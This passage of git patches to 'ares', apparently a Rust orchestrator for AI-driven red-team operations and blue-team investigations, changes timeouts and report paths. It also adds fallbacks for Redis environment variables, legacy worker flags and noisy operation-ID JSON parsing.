ares-tools/ ares-worker/ + -C "$(pwd)" Cargo.toml Cargo.lock Cross.toml tools.yaml .cargo/ ares-core/ ares-cli/ ares-llm/ ares-tools/ # Upload source to S3 echo -e "{{.INFO}} Uploading source to S3..." diff --git a/ares-cli/src/orchestrator/blue/investigation.rs b/ares-cli/src/orchestrator/blue/investigation.rs index d9583757..fd605ba6 100644 --- a/ares-cli/src/orchestrator/blue/investigation.rs +++ b/ares-cli/src/orchestrator/blue/investigation.rs @@ -337,7 +337,9 @@ pub(super) async fn generate_report( } }; - let reports_dir = resolve_report_dir(report_dir); + let reports_dir = resolve_report_dir(report_dir) + .join("blue") + .join("investigations"); if let Err(e) = std::fs::create_dir_all(&reports_dir) { warn!( @@ -347,7 +349,7 @@ pub(super) async fn generate_report( return; } - let report_path = reports_dir.join(format!("{investigation_id}_report.md")); + let report_path = reports_dir.join(format!("{investigation_id}.md")); match std::fs::write(&report_path, &report) { Ok(()) => { info!( diff --git a/ares-cli/src/orchestrator/blue/runner.rs b/ares-cli/src/orchestrator/blue/runner.rs index 47f1763a..33181f57 100644 --- a/ares-cli/src/orchestrator/blue/runner.rs +++ b/ares-cli/src/orchestrator/blue/runner.rs @@ -16,11 +16,13 @@ use ares_llm::{LlmProvider, ToolDispatcher}; use super::investigation::{self, Investigation}; -/// Timeout for a single investigation run (15 minutes). -const INVESTIGATION_TIMEOUT_SECS: u64 = 900; +/// Timeout for a single investigation run (45 minutes). +/// Loki queries via the Grafana proxy take 30-40s each from EC2, +/// so the agent needs more headroom to complete triage + hunting. +const INVESTIGATION_TIMEOUT_SECS: u64 = 2700; -/// Threshold for considering a running investigation as stale (15 minutes). -const STALE_INVESTIGATION_THRESHOLD_SECS: i64 = 900; +/// Threshold for considering a running investigation as stale (50 minutes). +const STALE_INVESTIGATION_THRESHOLD_SECS: i64 = 3000; /// Interval between periodic stale investigation checks (5 minutes). const STALE_CHECK_INTERVAL_SECS: u64 = 300; diff --git a/ares-cli/src/orchestrator/blue/sub_agent.rs b/ares-cli/src/orchestrator/blue/sub_agent.rs index 9f7ec3ef..04b8f5cf 100644 --- a/ares-cli/src/orchestrator/blue/sub_agent.rs +++ b/ares-cli/src/orchestrator/blue/sub_agent.rs @@ -20,7 +20,9 @@ use super::callbacks::BlueCallbackHandler; // --------------------------------------------------------------------------- /// Timeout for individual blue tool executions (e.g. Loki/Grafana queries). -const BLUE_TOOL_TIMEOUT_SECS: u64 = 120; +/// `execute_parallel_queries` runs up to 5 queries (2 concurrent), each with +/// a 90s HTTP timeout and up to 2 retries — worst-case ~540s. Give headroom. +const BLUE_TOOL_TIMEOUT_SECS: u64 = 600; /// Wraps an existing (red-team) dispatcher and intercepts blue tool names, /// routing them to `ares_tools::blue::dispatch_blue()` for local execution. diff --git a/ares-cli/src/orchestrator/completion.rs b/ares-cli/src/orchestrator/completion.rs index 8a54c36e..dc0d2a4d 100644 --- a/ares-cli/src/orchestrator/completion.rs +++ b/ares-cli/src/orchestrator/completion.rs @@ -211,7 +211,7 @@ pub async fn wait_for_completion( // When blue team is enabled, auto-submit an investigation from the // operation state if none have been submitted yet, then wait for all // investigations to drain before signalling stop. - // Cap at 20 minutes to avoid hanging forever if an investigation is stuck. + // Cap at 45 minutes to avoid hanging forever if an investigation is stuck. if std::env::var("ARES_BLUE_ENABLED").as_deref() == Ok("1") { info!("Blue team enabled — waiting for investigations to finish before shutdown"); let mut conn = dispatcher.queue.connection(); @@ -235,7 +235,7 @@ pub async fn wait_for_completion( warn!(err = %e, "Failed to auto-submit blue investigation"); } } - let blue_deadline = tokio::time::Instant::now() + Duration::from_secs(1200); + let blue_deadline = tokio::time::Instant::now() + Duration::from_secs(2700); loop { if *shutdown_rx.borrow() { info!("Completion monitor interrupted by shutdown while waiting for blue"); @@ -243,7 +243,7 @@ pub async fn wait_for_completion( } if tokio::time::Instant::now() >= blue_deadline { - warn!("Blue team wait deadline reached (20m) — proceeding with shutdown"); + warn!("Blue team wait deadline reached (45m) — proceeding with shutdown"); break; } diff --git a/ares-cli/src/worker/tool_executor.rs b/ares-cli/src/worker/tool_executor.rs index 9864636c..68d17d25 100644 --- a/ares-cli/src/worker/tool_executor.rs +++ b/ares-cli/src/worker/tool_executor.rs @@ -445,7 +445,7 @@ mod tests { #[test] fn redis_key_prefixes_match_orchestrator() { - // These must match tool_dispatcher.rs in ares-orchestrator + // These must match crate::orchestrator::tool_dispatcher assert_eq!(TOOL_EXEC_PREFIX, "ares:tool_exec"); assert_eq!(TOOL_RESULT_PREFIX, "ares:tool_results"); } From e17c82ac6cffcdf6ed5c35e5cdf2e59d5bb1de5b Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Fri, 17 Apr 2026 14:14:45 -0600 Subject: [PATCH 08/10] fix: support REDIS_URL as fallback for redis connection config **Changed:** - Updated CLI and configuration to accept `REDIS_URL` as a fallback if `ARES_REDIS_URL` is not set, improving compatibility with environments like Kubernetes where `REDIS_URL` is commonly used - Clarified documentation comment to mention both `ARES_REDIS_URL` and `REDIS_URL` as sources for the Redis URL in the CLI options - Changed error messages and default value logic in orchestrator and worker configs to reflect support for both environment variables --- ares-cli/src/cli/mod.rs | 2 +- ares-cli/src/main.rs | 7 ++++++- ares-cli/src/orchestrator/config.rs | 5 +++-- ares-cli/src/orchestrator/mod.rs | 5 +++-- ares-cli/src/worker/config.rs | 3 ++- 5 files changed, 15 insertions(+), 7 deletions(-) diff --git a/ares-cli/src/cli/mod.rs b/ares-cli/src/cli/mod.rs index 4b3df31e..e009d4df 100644 --- a/ares-cli/src/cli/mod.rs +++ b/ares-cli/src/cli/mod.rs @@ -25,7 +25,7 @@ pub(crate) struct Cli { #[command(subcommand)] pub command: Commands, - /// Redis URL (default: from ARES_REDIS_URL or redis://localhost:6379) + /// Redis URL (default: from ARES_REDIS_URL / REDIS_URL or redis://localhost:6379) #[arg(long, global = true, env = "ARES_REDIS_URL")] pub redis_url: Option, diff --git a/ares-cli/src/main.rs b/ares-cli/src/main.rs index c037b2fa..714d7ecf 100644 --- a/ares-cli/src/main.rs +++ b/ares-cli/src/main.rs @@ -88,7 +88,12 @@ async fn main() { } // ── Normal CLI parsing (env vars are now populated) ── - let cli = Cli::parse(); + let mut cli = Cli::parse(); + + // Fall back to REDIS_URL if ARES_REDIS_URL wasn't set (K8s pods expose REDIS_URL) + if cli.redis_url.is_none() { + cli.redis_url = std::env::var("REDIS_URL").ok(); + } if let Err(e) = run(cli).await { error!("{e:#}"); diff --git a/ares-cli/src/orchestrator/config.rs b/ares-cli/src/orchestrator/config.rs index fcaefb39..61d7e9a2 100644 --- a/ares-cli/src/orchestrator/config.rs +++ b/ares-cli/src/orchestrator/config.rs @@ -75,8 +75,9 @@ pub struct InitialCredential { impl OrchestratorConfig { /// Load configuration from environment variables with sensible defaults. pub fn from_env() -> anyhow::Result { - let redis_url = - env::var("ARES_REDIS_URL").unwrap_or_else(|_| "redis://127.0.0.1:6379/0".to_string()); + let redis_url = env::var("ARES_REDIS_URL") + .or_else(|_| env::var("REDIS_URL")) + .unwrap_or_else(|_| "redis://127.0.0.1:6379/0".to_string()); let raw_op = env::var("ARES_OPERATION_ID") .map_err(|_| anyhow::anyhow!("ARES_OPERATION_ID is required"))?; diff --git a/ares-cli/src/orchestrator/mod.rs b/ares-cli/src/orchestrator/mod.rs index 1d79481f..3d5232d9 100644 --- a/ares-cli/src/orchestrator/mod.rs +++ b/ares-cli/src/orchestrator/mod.rs @@ -684,8 +684,9 @@ async fn run_inner() -> Result<()> { async fn run_blue_only() -> Result<()> { info!("Running in BLUE-ONLY mode (no red team orchestrator)"); - let redis_url = - std::env::var("ARES_REDIS_URL").unwrap_or_else(|_| "redis://127.0.0.1:6379/0".to_string()); + let redis_url = std::env::var("ARES_REDIS_URL") + .or_else(|_| std::env::var("REDIS_URL")) + .unwrap_or_else(|_| "redis://127.0.0.1:6379/0".to_string()); // Load YAML config for observability URLs if let Ok(cfg) = ares_core::config::AresConfig::from_env() { diff --git a/ares-cli/src/worker/config.rs b/ares-cli/src/worker/config.rs index d3816b1a..c47fef8c 100644 --- a/ares-cli/src/worker/config.rs +++ b/ares-cli/src/worker/config.rs @@ -82,7 +82,8 @@ impl WorkerConfig { /// - `ARES_POLL_TIMEOUT` — BLPOP timeout in seconds (default: 5) pub fn from_env() -> anyhow::Result { let redis_url = env::var("ARES_REDIS_URL") - .map_err(|_| anyhow::anyhow!("ARES_REDIS_URL is required"))?; + .or_else(|_| env::var("REDIS_URL")) + .map_err(|_| anyhow::anyhow!("ARES_REDIS_URL (or REDIS_URL) is required"))?; let worker_role = env::var("ARES_WORKER_ROLE") .map_err(|_| anyhow::anyhow!("ARES_WORKER_ROLE is required"))?; From d58e6c9c605230598b871dfd0bf15e11a6bcf673 Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Fri, 17 Apr 2026 15:55:09 -0600 Subject: [PATCH 09/10] fix: improve compatibility with legacy worker and operation ID input formats **Added:** - Accept and ignore legacy positional role argument and Python-style `--worker-args.*` flags in the worker CLI command for compatibility **Changed:** - Update worker config to allow `ARES_ROLE` as a fallback for `ARES_WORKER_ROLE` environment variable, improving compatibility with legacy deployments - Enhance operation ID JSON parsing to handle strings prefixed with telemetry or log output, ensuring robust extraction of JSON payloads in orchestrator config - Update main CLI dispatch to support new worker command structure with legacy arguments **Removed:** - Legacy strictness requiring only `ARES_WORKER_ROLE` in worker config; now also accepts `ARES_ROLE` for better migration support --- ares-cli/src/cli/mod.rs | 10 +++++++++- ares-cli/src/main.rs | 2 +- ares-cli/src/orchestrator/config.rs | 16 ++++++++++++++-- ares-cli/src/worker/config.rs | 3 ++- 4 files changed, 26 insertions(+), 5 deletions(-) diff --git a/ares-cli/src/cli/mod.rs b/ares-cli/src/cli/mod.rs index e009d4df..de3041c3 100644 --- a/ares-cli/src/cli/mod.rs +++ b/ares-cli/src/cli/mod.rs @@ -81,5 +81,13 @@ pub(crate) enum Commands { Orchestrator, /// Run a worker (task executor) - Worker, + Worker { + /// Legacy positional role argument (ignored; use ARES_WORKER_ROLE env var) + #[arg(hide = true)] + _role: Option, + + /// Accept and ignore legacy Python-style --worker-args.* flags + #[arg(long = "worker-args.redis-url", hide = true)] + _legacy_redis_url: Option, + }, } diff --git a/ares-cli/src/main.rs b/ares-cli/src/main.rs index 714d7ecf..76a5f0e4 100644 --- a/ares-cli/src/main.rs +++ b/ares-cli/src/main.rs @@ -109,6 +109,6 @@ async fn run(cli: Cli) -> Result<()> { Commands::History(cmd) => history::run_history(cmd).await, Commands::Config(cmd) => config::run_config(cmd), Commands::Orchestrator => orchestrator::run().await, - Commands::Worker => worker::run().await, + Commands::Worker { .. } => worker::run().await, } } diff --git a/ares-cli/src/orchestrator/config.rs b/ares-cli/src/orchestrator/config.rs index 61d7e9a2..841ebb23 100644 --- a/ares-cli/src/orchestrator/config.rs +++ b/ares-cli/src/orchestrator/config.rs @@ -84,8 +84,12 @@ impl OrchestratorConfig { // ARES_OPERATION_ID may be a plain operation-id string OR a full JSON // payload (the queue dispatcher passes the entire operation request JSON). - let (operation_id, target_domain, target_ips, json_cred) = if raw_op.starts_with('{') { - let v: serde_json::Value = serde_json::from_str(&raw_op) + // The value may also be prefixed with log/telemetry output from the + // wrapper script, so we search for the first `{` in the string. + let json_start = raw_op.find('{'); + let (operation_id, target_domain, target_ips, json_cred) = if let Some(pos) = json_start { + let json_str = &raw_op[pos..]; + let v: serde_json::Value = serde_json::from_str(json_str) .map_err(|e| anyhow::anyhow!("Failed to parse ARES_OPERATION_ID JSON: {e}"))?; let op_id = v["operation_id"] .as_str() @@ -296,6 +300,14 @@ mod tests { assert_eq!(c.target_domain, "contoso.local"); assert_eq!(c.target_ips, vec!["192.168.58.1", "192.168.58.2"]); + // JSON payload prefixed with telemetry output (wrapper script noise) + let noisy = format!("2026-04-17T21:35:33Z INFO telemetry initialized\n{payload}"); + std::env::set_var("ARES_OPERATION_ID", &noisy); + let c = OrchestratorConfig::from_env().unwrap(); + assert_eq!(c.operation_id, "op-json-test"); + assert_eq!(c.target_domain, "contoso.local"); + assert_eq!(c.target_ips, vec!["192.168.58.1", "192.168.58.2"]); + // JSON payload with nested initial_credential (Python format) let payload = r#"{"operation_id":"op-cred","target_domain":"contoso.local","target_ips":[],"initial_credential":{"username":"admin","password":"Pass123","domain":"contoso.local"}}"#; std::env::set_var("ARES_OPERATION_ID", payload); diff --git a/ares-cli/src/worker/config.rs b/ares-cli/src/worker/config.rs index c47fef8c..e2e360be 100644 --- a/ares-cli/src/worker/config.rs +++ b/ares-cli/src/worker/config.rs @@ -86,7 +86,8 @@ impl WorkerConfig { .map_err(|_| anyhow::anyhow!("ARES_REDIS_URL (or REDIS_URL) is required"))?; let worker_role = env::var("ARES_WORKER_ROLE") - .map_err(|_| anyhow::anyhow!("ARES_WORKER_ROLE is required"))?; + .or_else(|_| env::var("ARES_ROLE")) + .map_err(|_| anyhow::anyhow!("ARES_WORKER_ROLE (or ARES_ROLE) is required"))?; let pod_name = env::var("ARES_POD_NAME") .or_else(|_| env::var("HOSTNAME")) From 1d08ebb11a788ba0dab9b86ff2b75feae6b10933 Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Fri, 17 Apr 2026 16:32:25 -0600 Subject: [PATCH 10/10] feat: support constructing redis url from k8s-style env vars **Changed:** - Enhance redis URL detection to build from REDIS_HOST, REDIS_PORT, REDIS_DB, and REDIS_PASSWORD if ARES_REDIS_URL and REDIS_URL are unset. Improves compatibility with Kubernetes and similar deployments - ares-cli/src/worker/config.rs - Update error message to clarify all accepted redis configuration variables --- ares-cli/src/worker/config.rs | 14 +++++++++++++- 1 file changed, 13 insertions(+), 1 deletion(-) diff --git a/ares-cli/src/worker/config.rs b/ares-cli/src/worker/config.rs index e2e360be..e772131e 100644 --- a/ares-cli/src/worker/config.rs +++ b/ares-cli/src/worker/config.rs @@ -83,7 +83,19 @@ impl WorkerConfig { pub fn from_env() -> anyhow::Result { let redis_url = env::var("ARES_REDIS_URL") .or_else(|_| env::var("REDIS_URL")) - .map_err(|_| anyhow::anyhow!("ARES_REDIS_URL (or REDIS_URL) is required"))?; + .or_else(|_| { + // Construct from individual components (K8s pods expose these) + let host = env::var("REDIS_HOST")?; + let port = env::var("REDIS_PORT").unwrap_or_else(|_| "6379".to_string()); + let db = env::var("REDIS_DB").unwrap_or_else(|_| "0".to_string()); + match env::var("REDIS_PASSWORD") { + Ok(pass) => Ok(format!("redis://:{pass}@{host}:{port}/{db}")), + Err(_) => Ok(format!("redis://{host}:{port}/{db}")), + } + }) + .map_err(|_: env::VarError| { + anyhow::anyhow!("Redis URL required: set ARES_REDIS_URL, REDIS_URL, or REDIS_HOST") + })?; let worker_role = env::var("ARES_WORKER_ROLE") .or_else(|_| env::var("ARES_ROLE"))